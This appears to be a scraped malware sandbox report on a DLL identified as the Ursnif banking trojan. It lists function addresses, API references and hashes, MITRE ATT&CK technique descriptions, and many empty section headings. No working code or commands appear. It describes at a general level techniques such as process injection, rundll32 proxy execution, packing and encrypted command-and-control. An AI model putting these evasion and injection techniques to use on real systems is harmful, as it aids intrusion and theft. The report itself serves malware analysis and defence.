Uniqueness Score: -1.00%

Function 6E10E274, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6E10E28B

Part of subcall function 6E10E980: ___BuildCatchObjectHelper.LIBCMT ref: 6E10E9B2
Part of subcall function 6E10E980: ___AdjustPointer.LIBCMT ref: 6E10E9C9

_UnwindNestedFrames.LIBCMT ref: 6E10E2A2
___FrameUnwindToState.LIBCMT ref: 6E10E2B4
CallCatchBlock.LIBCMT ref: 6E10E2D8

Memory Dump Source

Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: 5d1cd5e106f7e7765f246397fef7058a53d91a4c863335afadbdca4e939f9908
Instruction ID: b62e7bbcfcf331b7da79ade0389380820f1547ad09d8249ecc25ed2c62799e5a
Opcode Fuzzy Hash: 5d1cd5e106f7e7765f246397fef7058a53d91a4c863335afadbdca4e939f9908
Instruction Fuzzy Hash: 04010C32100109FBDF029F96CC01EDA7FBAFF58758F158415F91865120DB72EAA1EBA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 8OKQ6ogGRx.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Statistics

CPU Usage

Memory Usage

Function 00BB896F, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Function 6E0C195D, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 00BB7EC1, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Function 00BB1724, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 6E0C145E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 6E0C160D, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6E0C101B, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 00BB9DB0, Relevance: 33.2, APIs: 22, Instructions: 245
memorystringCOMMON

Function 00BBADA5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Function 00BB7780, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Function 6E0C1D6E, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Function 00BB165F, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 00BB21C5, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 6E0C1879, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 6E0C1E74, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 00BBA1E3, Relevance: 9.1, APIs: 6, Instructions: 60
sleepmemorytimeCOMMON

Function 6E0C1F56, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 00BB17EE, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Function 6E0C1C4E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97
memoryCOMMON

Function 00BB769A, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Function 6E0C1367, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 00BB86F0, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Function 00BB9958, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Function 6E0C10AD, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 00BB1E40, Relevance: 3.9, APIs: 3, Instructions: 155
stringCOMMON

Function 00BB9A9E, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Function 6E0C1718, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Function 00BB5369, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Function 00BB5BF1, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Function 00BB9CC9, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6E0C1FB4, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 6E0C1B56, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Function 00BB574A, Relevance: 1.3, APIs: 1, Instructions: 57
memoryCOMMON

Function 00BB1CCE, Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Function 00BB9D43, Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Function 00BB62D8, Relevance: 9.2, APIs: 6, Instructions: 223
memoryCOMMONCrypto